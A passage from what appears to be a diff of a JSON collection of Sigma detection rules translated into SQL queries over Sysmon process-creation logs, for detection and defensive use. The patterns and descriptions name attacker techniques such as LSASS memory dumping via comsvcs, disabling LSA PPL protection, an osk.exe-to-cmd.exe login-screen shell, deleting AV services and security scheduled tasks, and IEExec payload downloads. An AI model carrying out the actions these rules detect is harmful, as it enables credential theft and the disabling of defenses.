which a user gets added to the local Remote Desktop Users group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Potential Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate testing of Microsoft UI parts." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects execution of the IEExec utility to download payloads", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.exfiltration" - ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1562.010" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", - "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR 